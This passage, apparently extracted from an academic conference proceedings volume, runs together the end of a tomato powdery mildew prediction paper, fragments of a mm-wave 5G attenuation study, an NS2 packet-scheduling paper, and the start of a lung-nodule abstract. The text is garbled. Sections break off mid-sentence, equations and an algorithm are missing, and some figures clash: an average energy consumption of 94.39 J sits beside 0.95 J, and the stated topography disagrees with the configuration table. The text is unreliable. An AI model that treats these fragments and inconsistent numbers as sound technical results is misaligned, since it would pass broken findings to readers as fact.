models were tested using the Test-Set. Finally, a comparison of these models was made with the help of the “Accuracy” metric for selecting the most suitable algorithm for the present work. Figure 5 shows the confusion matrices for the DT, kNN, and RF algorithms. Based on these confusion matrices, the accuracies of the DT, kNN, and RF prediction models were calculated by putting the corresponding values of TP, TN, FP, and FN into Eq. (2):
Authors have observed that all the three algorithms, i.e., kNN, DT, and RF, performed well on the TPMD dataset, with accuracies lying in the range of 89.19% to 93.24%, which is considered fairly good. Results also indicate that the forecasting system based on RF performed the best among all the three models with an accuracy of 93.24%, whereas the DT-based model performed the worst with 89.19% accuracy, as shown in Fig. 6. Hence, it is fair to presume that the proposed model can be efficiently used in the farming industry for early detection of powdery mildew disease in tomato plants.
The TPMD dataset was collected by Bakeer et al. in 2013 [2] to validate a disease
prediction model introduced by Guzman-Plazola in 1997 [9]. Further, in 2020, this
dataset was used by Bhatia et al. [12] for detection of powdery mildew disease
using extreme learning machine (ELM) algorithm. They have used four resampling
Fig. 5 Confusion matrices (rows: predicted class; columns: actual class)

(a) DT algorithm:
                          Actual Conducive   Actual Non-Conducive
Predicted Conducive              10                   8
Predicted Non-Conducive           0                  56

(b) kNN algorithm:
                          Actual Conducive   Actual Non-Conducive
Predicted Conducive              12                   6
Predicted Non-Conducive           0                  56

(c) RF algorithm:
                          Actual Conducive   Actual Non-Conducive
Predicted Conducive              13                   5
Predicted Non-Conducive           0                  56
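As a cross-check, the accuracies reported in the text can be recomputed from the confusion-matrix counts above, treating “conducive” as the positive class (a Python sketch, not the authors' R code):

```python
def accuracy(tp, tn, fp, fn):
    """Eq. (2): correct predictions divided by total predictions."""
    return (tp + tn) / (tp + tn + fp + fn)

# Counts read off the confusion matrices in Fig. 5.
models = {
    "DT":  accuracy(tp=10, tn=56, fp=8, fn=0),   # 66/74
    "kNN": accuracy(tp=12, tn=56, fp=6, fn=0),   # 68/74
    "RF":  accuracy(tp=13, tn=56, fp=5, fn=0),   # 69/74
}
```

Rounded to two decimals, these give 89.19%, 91.89%, and 93.24%, matching the values reported for the three models.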
Fig. 6 Performance comparison of the three models: accuracy of DT = 89.19%, kNN = 91.89%, and RF = 93.24%
5 Conclusion and Future Scope
In the current study, authors have used three machine learning approaches, namely kNN, DT, and RF, to develop different disease prediction models, and it was found that the RF technique performed the best on the TPMD dataset with 93.24% accuracy. Using the TPMD dataset, the proposed kNN, DT, and RF-based prediction models could predict
whether the meteorological conditions on a particular day are conducive for the
development of disease or not. If the model classifies a particular day as conducive,
then a warning may be sent to the farmer indicating the need to spray the fungicide
at that point of time. This way, the recommendations of the proposed models in
the current study can be used to reduce the unnecessary fungicide spray with no
significant impact on the yield and quality of the fruit. In the future, we are planning
to develop a mobile-based application for the early detection of the tomato diseases
on the basis of weather conditions. Once the disease is diagnosed by the model,
this application will suggest the possible solutions through some communication
medium, which will in turn help the farmers to protect the tomato crop by timely
application of control measures. An online plant disease predictor can also be developed, which will give all the details about conducive weather conditions for a specific disease and also provide possible treatment as per the severity level of that particular disease.
Acknowledgements This work is financially supported by the Department of Science and Tech-
nology (DST) under a project with reference number “DST/Reference.No.T-319/2018-19.” We are
grateful to them for their immense support.
References
1. Jones, W. B., & Thomson, S. V. (1987). Source of inoculum, yield, and quality of tomato as
affected by Leveillula taurica. Plant Disease, 71(3), 266–268.
2. Bakeer, A. R. T., Abdel-Latef, M. A. E., Afifi, M. A., & Barakat, M. E. (2013). Validation of
tomato powdery mildew forecasting model using meteorological data in Egypt. International
Journal of Agriculture Sciences, 5(2), 372.
3. Verma, S., Bhatia, A., Chug, A., & Singh, A. P. (2020). Recent advancements in multimedia
big data computing for IoT applications in precision agriculture: opportunities, issues, and
challenges. In Multimedia big data computing for IoT applications (pp. 391–416). Springer,
Singapore.
4. Fuentes, A., Yoon, S., Kim, S. C., & Park, D. S. (2017). A robust deep-learning-based detector
for real-time tomato plant diseases and pests recognition. Sensors, 17(9), 2022.
5. Verma, S., Chug, A., & Singh, A. P. (2018). Prediction models for identification and diagnosis of tomato plant diseases. In 2018 International Conference on Advances in Computing, Communications and Informatics (ICACCI) (pp. 1557–1563).
6. Verma, S., Chug, A., & Singh, A. P. (2020). Application of convolutional neural networks for
evaluation of disease severity in tomato plant. Journal of Discrete Mathematical Sciences and
Cryptography, 23(1), 273–282.
7. Verma, S., Chug, A., & Singh, A. P. (2020). Exploring capsule networks for disease
classification in plants. Journal of Statistics and Management Systems, 23(2), 307–315.
8. Verma, S., Chug, A., Singh, A. P., Sharma, S., & Rajvanshi, P. (2019). Deep learning-based
mobile application for plant disease diagnosis: a proof of concept with a case study on tomato
plant. In Applications of image processing and soft computing systems in agriculture (pp. 242–
271). IGI Global.
9. Guzman-Plazola, R. A. (1997). Development of a spray forecast model for tomato powdery
mildew (Leveillula taurica (Lev.) Arn.). University of California, Davis.
10. Bhatia, A., Chug, A., & Singh, A. P. (2020). Hybrid SVM-LR classifier for powdery mildew
disease prediction in tomato plant. In 2020 7th International Conference on Signal Processing
and Integrated Networks (SPIN) (pp. 218–223). IEEE.
11. Bhatia, A., Chug, A., & Singh, A. P. (2020). Plant disease detection for high dimensional
imbalanced dataset using an enhanced decision tree approach. International Journal of Future
Generation Communication and Networking, 13(4), 71–78.
12. Bhatia, A., Chug, A., & Singh, A. P. (2020). Application of extreme learning machine in
plant disease prediction for highly imbalanced dataset. Journal of Statistics and Management
Systems, 23(6), 1059–1068. https://doi.org/10.1080/09720510.2020.1799504
13. Ghaffari, R., Zhang, F., Iliescu, D., Hines, E., Leeson, M., Napier, R., & Clarkson, J. (2010).
Early detection of diseases in tomato crops: an electronic nose and intelligent systems approach.
In The 2010 International Joint Conference on Neural Networks (IJCNN) (pp. 1–6). IEEE.
14. Rumpf, T., Mahlein, A.-K., Steiner, U., Oerke, E.-C., Dehne, H.-W., & Plümer, L. (2010).
Early detection and classification of plant diseases with support vector machines based on
hyperspectral reflectance. Computers and Electronics in Agriculture, 74(1), 91–99.
15. Prince, G., Clarkson, J. P., & Rajpoot, N. M. (2015). Automatic detection of diseased tomato plants using thermal and stereo visible light images. PLoS One, 10(4), e0123262.
16. Mokhtar, U., Ali, M. A. S., Hassenian, A. E., & Hefny, H. (2015). Tomato leaves diseases
detection approach based on support vector machines. In 2015 11th International Computer
Engineering Conference (ICENCO) (pp. 246–250). IEEE.
17. Vishwakarma, V. P., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools and Applications, 1–27.
18. Kotsiantis, S. B. (2013). Decision trees: A recent overview. Artificial Intelligence Review, 39(4),
261–283.
19. Liaw, A., & Wiener, M. (2002). Classification and regression by randomForest. R news, 2(3),
18–22.
20. Sabrol, H., & Kumar, S. (2016). Intensity based feature extraction for tomato plant disease
recognition by classification using decision tree. International Journal of Computer Science
and Information Security, 14(9), 622.
Investigate the Effect of Rain, Foliage,
Atmospheric Gases, and Diffraction
on Millimeter (mm) Wave Propagation
for 5G Cellular Networks
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 521
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_42
522 A. Tripathi et al.
To fulfill the challenges of a rising need for higher data rates, larger network infrastructure, and greater spectral efficiency, 5G cellular networks have recently been introduced. The data capacity is significantly improved by increasing the channel bandwidth for different services, to support high-speed Internet-based connectivity and applications requiring minimal latency [1]. The millimeter (mm) wave band will be used in a substantial way to satisfy the requirement for large bandwidth. In mm-wave propagation, atmospheric losses between 28 and 38 GHz do not add significantly to the path loss, which is why these bands are considered promising for 5G communications; in the higher frequency ranges of the mm-wave band, however, which are to be used for 5G connectivity deployment in the near future, atmospheric absorption occurs. Propagation studies have been carried out to test the impact of total path loss at 28 and 38 GHz, and those only for the consequences of rain fading in the mm-wave band. For the better deployment of the 5G mobile network in the future, there is a need to evaluate the effect of rain, foliage, and other atmospheric attenuation on the output of the cellular mm-wave system at higher frequency ranges. These bands have certain constraints: the signals cannot travel significant distances and cannot penetrate structures and other objects. These restrictions can be profitably exploited to provide more secure communication and permit high frequency reuse [2–5].
This paper examines the propagation characteristics of mm-waves and the impact of external elements such as atmospheric gases, rain, foliage, and diffraction, and proposes a data-driven, computational intelligence-based generic framework to optimize quality of service (QoS) parameters such as bandwidth and path loss. Our fundamental focus is to consider the impact of these components on the propagation of the mm-wave frequencies to be utilized in 5G cellular networks. We assess the attenuation due to atmospheric gases, rain, and foliage at the different mm-wave frequencies which should be utilized in 5G cellular networks.
Our investigation was carried out through MATLAB simulations, using the ITU-R P.676-10 model to calculate the attenuation due to fog, rain, and atmospheric gases.
Millimeter (mm) Wave Propagation—mm-wave communication systems are widely used in today's world, providing solutions for the high data rates demanded by mobile communications under restricted bandwidth. Mm-waves have wavelengths ranging from 1 to 10 mm and support bandwidths of up to 10 Gbit/s [6]. This band has the potential to fulfill the requirements of 5G communications [7]. In the literature, various researchers have studied the effect of atmospheric fading only for a few frequency bands of the mm-wave spectrum, whereas we consider the whole mm-wave band. In China, 5G-oriented work started in 2006 with the 59–64 GHz RF band [8]. Furthermore, the RF bands 40.5–42.3 GHz and 48.4–50.2 GHz are used under light license management, while the unlicensed RF bands 42.3–47 GHz and 47.2–48.4 GHz are used for communication [8]. In 2010, the Chinese wireless personal access network (CWPAN) standard working group set up Study Group 5 (SG5), also called SG5 QLINKPAN, to investigate the feasibility of a 45 GHz RF band for different applications. In China, the issued 60 GHz spectrum comprises 5 GHz of contiguous mm-wave bandwidth in the 59–64 GHz band. In early 2017, South Korea issued a national broadband plan which suggests extending the spectrum in the 28 GHz band by up to 2 GHz to provide access to a total of 3 GHz, 26.5–29.5 GHz. In 2018, South Korea decided to hold an auction of mm-wave 5G spectrum with 2400 MHz bandwidth in the 28 GHz band for three mobile operators [9, 10]. In late 2018, the three national mobile network operators (MNOs) in South Korea (SK Telecom, Korea Telecom (KT), and LG U+) launched 5G technology with mobile hot spots.
The main contribution of this paper is to investigate the effect of rain, fog, cloud, and
atmospheric gases on the whole frequency range at different atmospheric conditions;
apart from this, we suggest a computational framework. After the introduction, this
paper is systematized as follows. Section 2 analyzes the effect due to atmospheric
gas. Section 3 analyzes the effect due to fog and cloud. Section 4 analyzes the effect
due to rain. Section 5 discusses the proposed generic framework with a simulation
study. Finally, this paper is concluded in Sect. 6, where the future scope and further work are outlined.
This section computes the attenuation of a signal that propagates through the gases present in the atmosphere. Electromagnetic (EM) signals weaken when they propagate through the atmosphere. This effect is due mainly to the resonance lines of oxygen and water vapor, with a small loss due to nitrogen gas [11]. The model additionally incorporates a continuous absorption spectrum below 10 GHz. The model is valid for frequencies ranging from 1 to 1000 GHz and applies to polarized and non-polarized fields. The expression for the specific attenuation at each frequency is given by Eq. 1
γ = γo(f) + γw(f) = 0.1820 f N″(f)    (1)
where N″(f) is the imaginary part of the complex refractivity, which contains a continuous part and a sum over spectral lines, as given by Eq. 2

N″(f) = Σi Si Fi + N″D(f)    (2)
For atmospheric water vapor, the intensity of each spectral line is given by Eq. 4

Si = b1 × 10⁻¹ (300/T)^3.5 exp(b2 (1 − 300/T)) W    (4)

W = ρT/216.7    (5)
where W is the water vapor partial pressure (Eq. 5) and P + W is the total atmospheric pressure.
To calculate the overall attenuation for narrowband signals on a path, the specific attenuation is multiplied by the length of the path, R. The overall attenuation is then Lg = R(γo + γw).
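The relations above can be sketched in Python (the paper's simulations were run in MATLAB). The coefficients b1 and b2 are line-specific values from the ITU-R P.676 spectroscopic tables, so any numbers passed in here are illustrative only:

```python
import math

def line_intensity(b1, b2, temp_k, rho):
    """Eqs. (4)-(5): spectral line intensity for a water-vapor line.
    b1 and b2 are line-specific coefficients from the ITU-R P.676 tables
    (illustrative values only); rho is the water-vapor density (g/m^3)
    and temp_k the temperature (K)."""
    w = rho * temp_k / 216.7          # Eq. (5): water-vapor partial pressure
    theta = 300.0 / temp_k
    return b1 * 1e-1 * theta ** 3.5 * math.exp(b2 * (1.0 - theta)) * w

def total_gas_attenuation(gamma_o, gamma_w, path_km):
    """Lg = R * (gamma_o + gamma_w): overall narrowband loss (dB) over a
    path of length R km, given specific attenuations in dB/km."""
    return path_km * (gamma_o + gamma_w)
```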
A separate function applies the cloud and fog attenuation model of the “International Telecommunication Union (ITU)” to measure the attenuation due to cloud and fog along the signal path. The model is based on the signal path length, the signal frequency, the liquid water density, and the ambient temperature. It refers to instances where the signal path is completely contained in a uniform fog or cloud environment, so that the density of liquid water does not vary along the signal path.
The attenuation of signals that propagate through fog or clouds is determined by this model (Recommendation ITU-R P.840-6), which gives the specific attenuation (dB/km) of the signal in polarized and non-polarized fields [12]. The expression for the specific attenuation at each frequency is given by Eq. 6

γc = kl(f) M    (6)

where kl(f) is the specific attenuation coefficient ((dB/km)/(g/m³)) and M is the liquid water density (g/m³).
The specific attenuation due to rain is given by Eq. 7

γR = k R^α    (7)

where R is the rain rate (mm/h). The parameters k and α depend on the signal frequency, the angle of elevation, and the polarization condition.
To calculate the overall attenuation for narrowband signals along a path, the specific rain attenuation is multiplied by the effective propagation distance, deff. The absolute attenuation is then L = deff γR. The effective distance is the product of the geometrical distance, d, and a scale factor

r = 1 / (0.477 d^0.633 R0.01^(0.073α) f^0.123 − 10.579(1 − exp(−0.024 d)))    (8)

where f is the frequency (GHz), d is the path length (km), and R0.01 is the rain rate exceeded for 0.01% of the time (mm/h).
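Eqs. (7) and (8) can be combined into a short Python sketch (the paper's simulations used MATLAB). The coefficients k and α would come from the ITU-R P.838 tables, so the sample values are illustrative only:

```python
import math

def rain_specific_attenuation(rain_rate, k, alpha):
    """Eq. (7): gamma_R = k * R^alpha (dB/km). k and alpha depend on
    frequency, elevation angle, and polarization (ITU-R P.838 tables);
    sample values are illustrative only."""
    return k * rain_rate ** alpha

def distance_factor(d_km, r001, f_ghz, alpha):
    """Eq. (8): scale factor r applied to the geometrical path length."""
    return 1.0 / (0.477 * d_km ** 0.633 * r001 ** (0.073 * alpha)
                  * f_ghz ** 0.123
                  - 10.579 * (1.0 - math.exp(-0.024 * d_km)))

def total_rain_attenuation(d_km, r001, f_ghz, k, alpha):
    """L = d_eff * gamma_R, with the effective distance d_eff = d * r."""
    gamma_r = rain_specific_attenuation(r001, k, alpha)
    return d_km * distance_factor(d_km, r001, f_ghz, alpha) * gamma_r
```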
In this section, we describe our simulation work. We obtain the attenuation due to atmospheric gases, clouds, and rain at different rain rates [16, 17]. To make the results easier to interpret, we have divided the whole mm-wave band into different frequency ranges. First, we investigate the attenuation due to atmospheric gases, dividing the band into the 20–50 GHz, 50–100 GHz, 100–200 GHz, and 200–300 GHz ranges. Proposed framework—Based on the analysis of previously collected data, a data-driven framework will be proposed in the future which will optimize the required quality of service (QoS) parameters. The framework is as follows.
General framework using computational intelligence:
In Fig. 1, the graph shows the attenuation for the frequency range 20–50 GHz; there are two lines in the graph, one blue and one red. The blue line shows the absorption due to oxygen and air with a water density of 7 g/m³, and the red line shows the attenuation due to oxygen and dry air with zero water density. They clearly show that signal attenuation is higher for air with water content than for dry air. In the frequency range 20–50 GHz, attenuation is not significantly high, but Fig. 2 clearly shows that at 60 GHz the attenuation is 14.65 dB, which is not suitable for 5G cellular networks. In Fig. 3, there are two peaks in the graph: at 120 GHz, where the specific attenuation is 2 dB, which is not severe, but at 183 GHz the loss due to atmospheric gases is 28.34 dB, which is significantly high. Figure 4 shows the graph for the 200–300 GHz frequency range, where the losses do not fluctuate much.
After investigating attenuation due to atmospheric gases, we investigate the effect
of fog and cloud and calculate the attenuation of signals that spread through a cloud
Fig. 6 Rain attenuation for frequency 20–300 GHz at rain rate 10 mm/hr
Fig. 7 Rain attenuation for frequency 20–300 GHz at rain rate 15 mm/hr
Fig. 8 Rain attenuation for frequency 20–300 GHz at rain rate 20 mm/hr
the future, we will develop different data-driven and mathematical models to address
the problem using computational intelligence frameworks.
References
1. Rappaport, T., et al. (2013). Millimeter wave mobile communications for 5G cellular: It will work! IEEE Access, 1, 335–349.
2. Marcus, M., & Pattan, B. (2005). Millimeter wave propagation: Spectrum management
implications. IEEE Microwave Magazine, 6(2), 54–62.
3. Pi, Z., & Khan, F. (2011). An introduction to millimeter-wave mobile broadband systems.
Communications Magazine, IEEE, 49(6), 101–107.
4. Wheeler, T. (2016). Leading towards next generation “5G” mobile services. Federal Communications Commission. Retrieved 25 July 2016.
5. Yong, L., Depeng, J., Li, S., & Athanasios, V. V. (2015). A survey of millimeter wave (mmWave)
communications for 5G: opportunities and challenges (pp. 1–20)
6. Rappaport, T. S., et al. (2015). Millimeter wave wireless communications. Pearson Education.
7. Uwaechia, A. N., & Mahyuddin, N. M. (2020). A comprehensive survey on millimeter
wave communications for fifth-generation wireless networks: feasibility and challenges. IEEE
Access, 8, 62367–62414.
8. Haiming, W., Wei, H., Jixin, C., Bo, S., & Xiaoming, P. (2014). IEEE 802.11aj (45 GHz):
A new very high throughput millimeter-wave WLAN system. China Communications, 11(6),
51–62.
9. Kürner, T., & Priebe, S. (2014). Towards THz communications: Status in research, standardization and regulation. Journal of Infrared, Millimeter, and Terahertz Waves, 35(1), 53–62.
10. Current 5G Commercial Network Including Current 5G Research (2019, December 12) 5G
Field Testing/5G Trials, and 5G Development by Country.
1 Introduction
In today’s era, the ongoing requirements of mobile data collection within IoT-enabled networks pose challenges in designing energy-efficient networks, communication types, network topology, and packet scheduling for effective data delivery. Several node structures and deployment schemes have been suggested [1–3]. Looking at daily requirements, there is tremendous growth in multimedia devices. These
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 535
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_43
536 S. Kurumbanshi et al.
devices produce data that are useful in designing sensors for IoT-enabled networks. The number of sensors connected to IoT networks reached almost 24 billion in 2020 [4, 5].
The sensors generate data from various collection units such as bridges, roads, and street lamps. Collecting multimedia data from nodes therefore becomes an important concern in the IoT. The limited delivery range of a sensor neither satisfies user demands nor supports multimedia-enabled big data applications. Deploying data sensors and their related communication technologies is costly. One effective way to address this issue is to deploy mobile nodes that collect data and transmit multimedia data while moving [6]. Hybrid protocols (HWMP) operating at layer 2 have been developed in the IEEE standard. They include mesh points connected to gateways, which are more efficient at avoiding network congestion [7]. Load balancing effectively reduces congestion in networks. In wireless mesh networks, traffic is distributed over the least-congested paths to achieve better performance [8, 9]. Several routing methods have been suggested to balance the routing load and improve link quality for ad hoc networks [10–15].
In multi-path routing mechanisms, routing metrics have been suggested that consider wireless link quality [16, 17], the energy of neighboring nodes and interference [18], QoS-aware load-balanced AOMDV (QLB-AOMDV) in [19], and load-balanced congestion-adaptive routing in [20]. These routing algorithms have higher overheads and are suited to ad hoc networks with moving nodes.
2 Related Work
using NS2, and it is shown that OECP achieves a higher packet delivery ratio with lower energy consumption and end-to-end delay [23].
For quickly changing topologies, an RPL-based IoT network has been proposed to reduce power consumption. A mobility level is defined for each node in the RPL network to estimate the movement of neighboring nodes. The node adjusts the interval of its control messages depending on the mobility level value. In this way, paths are kept updated, which helps reduce power consumption.
3 Methodology
Looking at the ongoing demand for IoT-enabled networks and the various advancements in mobile networks, an energy-efficient battery management technique is needed. We propose a mobile ad hoc network in a grid scenario in which packet scheduling is controlled using Pareto and exponential distributions to set the interarrival time between packets. For the proposed network, the probability density function and cumulative distribution function are derived for the Pareto and exponential distributions. The cumulative distribution functions of Pareto-distributed and exponentially distributed traffic have uniform energy density; for this reason, packets are scheduled uniformly with less energy consumption.
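Interarrival-time generation under the two distributions can be sketched with inverse-CDF sampling. The shape, scale, and rate parameters below are illustrative, not the simulation's actual settings:

```python
import random
import math

def exponential_interarrival(rate):
    """Inverse-CDF sample from F(x) = 1 - exp(-rate * x)."""
    u = random.random()
    return -math.log(1.0 - u) / rate

def pareto_interarrival(shape, scale):
    """Inverse-CDF sample from F(x) = 1 - (scale / x)**shape, x >= scale."""
    u = random.random()
    return scale / (1.0 - u) ** (1.0 / shape)

# Schedule 5 packets with exponentially distributed gaps (mean 1/rate).
random.seed(0)
send_times, t = [], 0.0
for _ in range(5):
    t += exponential_interarrival(rate=2.0)
    send_times.append(t)
```

Setting the interarrival times this way is what spreads packet transmissions (and hence energy drain) more evenly over the simulation interval.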
Figure 1 shows the proposed packet scheduling methodology, in which networks with varying numbers of nodes are tested using plain DSR and the proposed DSR with Pareto and DSR with exponential distributions. The packet delivery and residual energy of the proposed algorithm are compared with the existing DSR protocol.
Fig. 1 Proposed methodology
Algorithm
4 Results
Networks are set up with mobile nodes to observe and test the performance of the packet scheduling algorithm in terms of packet delivery and residual network energy. An ad hoc network of 50 moving nodes is set up in a grid scenario with the configuration parameters specified in Table 1. Network density is varied from 10 to 50 nodes. The network is simulated for 10 s in NS2 and tested for various performance parameters under DSR, DSR with Pareto, and DSR with exponential packet arrival patterns, as explained in Table 4. Figure 2 shows the network setup for 50 mobile nodes in the grid scenario. The network topography is configured as 4700 × 472 m. Node movements are created with a pause time of 10 s and a velocity of 20 m/s for nodes n0–n9 and n20–n29 (Tables 2 and 3).
The performance of the network is tested for 50 mobile nodes with DSR, DSR with Pareto, and DSR with the exponential method, as discussed in Table 4. The results show that the packet delivery ratio improves from 93.58 to 95.95% for DSR with Pareto, with a good amount of residual energy. Packet delivery also improves from 93.58 to 97.54% with the exponential distribution, with the average residual energy improving from 4.05 to 4.14 J.
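These metrics follow directly from the trace counts. A small helper, shown here with hypothetical counts rather than the paper's actual trace, might look like:

```python
def packet_delivery_ratio(sent, received):
    """PDR (%) = received / sent * 100."""
    return 100.0 * received / sent

def average_residual_energy(initial_j, consumed_total_j, num_nodes):
    """Mean per-node energy left after the simulation."""
    return initial_j - consumed_total_j / num_nodes

# Hypothetical trace: 2000 packets sent, 1900 received, 50 nodes
# starting with 5 J each and consuming 46 J in total.
pdr = packet_delivery_ratio(2000, 1900)            # 95.0 %
residual = average_residual_energy(5.0, 46.0, 50)  # 4.08 J
```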
Packet Scheduling Algorithm to improvise the Packet Delivery … 539
Table 1 Configuration parameters for a wireless ad hoc network with 50 mobile nodes in grid topology

Sr. No | Parameter | Value
1 | Channel | Wireless channel
2 | Propagation | Two-ray ground
3 | MAC | 802.11
4 | Antenna | Omni antenna
5 | Number of nodes | 50
6 | IFQ length | 50
7 | Routing protocol | DSR
8 | X (m) | 4007
9 | Y (m) | 100
10 | Simulation time (s) | 10.0
11 | Initial energy (J) | 5
12 | Tx power (W) | 0.9
13 | Rx power (W) | 0.8
14 | Sense power (W) | 0.0175
15 | Idle power (W) | 0.0
Table 3 Parameters of the exponential distribution for 50 nodes

Sr. No | Parameter | Value
1 | Packet size | 100
2 | Burst time (ms) | 500
3 | Idle time (ms) | 500
4 | Rate (k) | 1
Table 4 Performance comparison of DSR, DSR with Pareto, and DSR with exponential for 50 nodes

Sr. No | Parameter | DSR | DSR with Pareto | DSR with exponential
1 | Number of packets sent (bytes) | 1667 | 1545 | 1665
2 | Number of packets received (bytes) | 1590 | 1482 | 1624
3 | PDR (%) | 93.58 | 95.95 | 97.54
4 | Total energy consumption (J) | 46.25 | 46.85 | 41.42
5 | Average energy consumption (J) | 94.39 | 0.95 | 0.85
6 | Overall residual energy (J) | 198.7 | 196 | 203.04
7 | Average residual energy (J) | 4.05 | 4.04 | 4.14
Figure 3 shows the NAM file deployed for 40 mobile nodes. The network topography is set as 5894 × 428 m, and the network is simulated for 10 s. Node movements are again created with a pause time of 10 s and a velocity of 20 m/s for nodes n0–n9 and n20–n29. The performance of the network for 40 mobile nodes with the DSR protocol, DSR with Pareto, and DSR with the exponential approach is specified in Table 5. It shows that packet delivery improves from 67.02 to 89.22% for DSR with Pareto, with the average residual energy improving from 3.74 to 4.05 J. Packet delivery also improves from 67.02 to 83.37% for DSR with the exponential approach, with the average residual energy improving from 3.74 to 3.96 J.
5 Conclusion
In this paper, a novel packet scheduling algorithm is proposed to improve the packet
delivery ratio and residual energy of IoT-enabled networks. In contrast to the previous
Table 5 Performance parameters for DSR, DSR with Pareto, and DSR with exponential for 40 mobile nodes in a mobile scenario

Sr. No | Parameter | DSR | DSR with Pareto | DSR with exponential
1 | Number of packets sent (bytes) | 1331 | 1568 | 1684
2 | Number of packets received (bytes) | 892 | 1399 | 1404
3 | PDR (%) | 67.02 | 89.22 | 83.37
4 | Total energy consumption (J) | 49.08 | 36.91 | 40.14
5 | Average energy consumption (J) | 1.25 | 0.946 | 1.029
6 | Overall residual energy (J) | 145.892 | 158.06 | 154.83
7 | Average residual energy (J) | 3.74 | 4.05 | 3.96
studies, our scheme combines traffic scheduling with the proposed Pareto- and exponentially distributed traffic to form a routing policy. The packet delivery of the network improves by around 17% over normal DSR routing, and energy is saved even at this higher packet delivery ratio. Packet scheduling is done uniformly using the cumulative distribution function; since the energy parameters are proportional to the cumulative distribution function, the proposed approach saves energy accordingly.
References
1. Ang, L.-M., Seng, K. P., Zungeru, A. M., & Ijemaru, G. K. (2017). Big sensor data systems
for smart cities. IEEE Internet of Things Journal, 4(5), 1259–1271.
2. Liu, X., Liu, Y., Liu, A., & Yang, L. (2019) Defending on-off attacks using light probing
messages in smart sensors for industrial communication systems. IEEE Transactions Industrial
Information, to be published. https://doi.org/10.1109/TII.2018.2836150
3. Feng, T.-H., Li, W. T., & Hwang, M.-S. (2015). A false data report filtering scheme in wireless
sensor networks: A survey. International Journal Network Security, 17(3), 229–236.
4. Huang, M., Liu, A., Xiong, N. N., Wang, T., & Vasilakos, A. V. (2018). A low-latency commu-
nication scheme for mobile wireless sensor control systems. In IEEE Transactions Systems
Management Cybernetics Systems, to be published. https://doi.org/10.1109/TSMC.2018.283
3204
5. Shen, V. R. L., Shen, R.-K., & Yang, C.-Y. (2016). Cost optimization of a path protection system
with partial bandwidth using petri nets. Wireless Personal Communications, 90(3), 1239–1259.
6. Li, T., Tian, S., Liu, A., Liu, H., & Pei, T. (2018). DDSV: optimizing delay and delivery ratio
for multimedia big data collection in mobile sensing vehicles. IEEE Internet of Things Journal,
5(5).
7. Hu, M., Zhang, J., & Yue, G. (2010). A novel load balancing scheme for hybrid routing protocol in IEEE 802.11 mesh networks. In 3rd IEEE International Conference on Broadband Network and Multimedia Technology (pp. 664–648).
8. Jung, W. J., Lee, J. Y., & Kim, B. C. (2014). Joint link scheduling and routing for
load balancing in STDMA wireless mesh networks. International Journal Communications
Networks Information Security, 6(3), 246–252.
9. Nguyen, L. T., Beuran, R., & Shinoda, Y. (2008). A load-aware routing metric for wireless
mesh networks. IEEE Computers and Communications (ISCC), 429–435.
10. Chen, J., Li, Z., Liu, J., & Kuo, Y. (2011) QoS multipath routing protocol based on cross layer
design for ad hoc networks. In 2011 International Conference Internet Computing Information
Services (Vol 1, no. 2, pp. 261–264).
11. Gopalan, N. P. (2009). A QoS-based robust multipath routing protocol for mobile adhoc
networks. In First Asian Himalayas International Conference Internet 2009, AH-IC.
12. Ktari, S., Labiod, H., & Frikha, M. (2006). Load balanced multipath routing in mobile ad hoc
network. In 10th IEEE Singapore International Conference Communications Systems. ICCS
2006 (pp. 1–5).
13. Maleki, H., Kargahi, M., & Jabbehdari, S. (2014). RTLB-DSR: A load-balancing DSR-based QoS routing protocol in MANETs. In Proceedings of the 4th International Conference on Computer and Knowledge Engineering (ICCKE 2014) (pp. 728–735).
14. Mallapur, S. V., Patil, S. R., & Agarkhed, J. V. (2015). Multipath load balancing technique for congestion control in mobile ad hoc networks. In 2015 Fifth International Conference on Advanced Computing and Communications (pp. 204–209).
15. Yamaguchi, K., Nagahashi, T., Akiyama, T., Yamaguchi, T., & Matsue, H. (2016). A routing
based on OLSR with traffic load balancing and QoS for Wi-Fi mesh network. In International
Conference Information Networking vol. 2016–March (pp. 102–107).
Packet Scheduling Algorithm to improvise the Packet Delivery … 543
16. Gomez, K., Riggio, R., Rasheed, T., & Chlamtac, I. (2011). On efficient airtime-based fair link scheduling in IEEE 802.11-based wireless networks. In IEEE 22nd International Symposium on Personal, Indoor and Mobile Radio Communications (pp. 930–934).
17. Javaid, N., Ahmad, A., Imran, M., Alhamed, A. A., & Guizani, M. (2016). BIETX: a new
quality link metric for static wireless multi-hop networks. In 2016 International Wireless
Communications Mobile Computing Conference IWCMC, (Vol 1, pp. 784–789).
18. Sujatha, A. D., Terdal, P., & Mytri, V. D. (2012). A link quality based dispersity routing algorithm for mobile ad hoc networks. International Journal of Computer Network and Information Security (IJCNIS). [Online] Available: http://www.mecspress.org/ijcnis/ijcnis-v4-n9/v4n9-3.html
19. Tekaya, M., Tabbane, N., Tabbane, S., & Supérieure, E. (2010). Multipath routing with load
balancing and QoS in ad hoc network. 10(8), 280–286.
20. Kim, J., Tomar, G. S., Shrivastava, L., Bhadauria, S. S., & Lee, W. (2014) Load balanced
congestion adaptive routing for mobile ad hoc networks. (Vol. 2014).
21. Noorani, N., & Seno, S. A. H. (2018). Routing in VANETs based on intersection using SDN and fog computing. In 8th International Conference on Computer and Knowledge Engineering (ICCKE 2018), October 25–26, Ferdowsi University of Mashhad.
22. Khoza, E., Tu, C., & Adewale Owolawi, P. (2018). An ant colony hybrid routing protocol for
VANET, 6–7 December.
23. Lakshmi Prabha, K., & Selvan, S. (2019). Optimal energy consumption protocol to improve Qos
in delay tolerant networks. In 2019 1st international Conference on Innovations in Information
and Communication Technologies.
Abstract Cancer is one of the leading causes of mortality worldwide, lung cancer
being one of the deadliest. Early detection and accurate diagnosis of lung nodules
can save many lives and resources. A number of diagnostic radiology techniques are utilized for the detection of lung nodules, of which computed tomography (CT) provides better discernment of the disease and is thus explored extensively for automatic nodule analysis.
However, manual analysis of radiological images is time-consuming and prone to
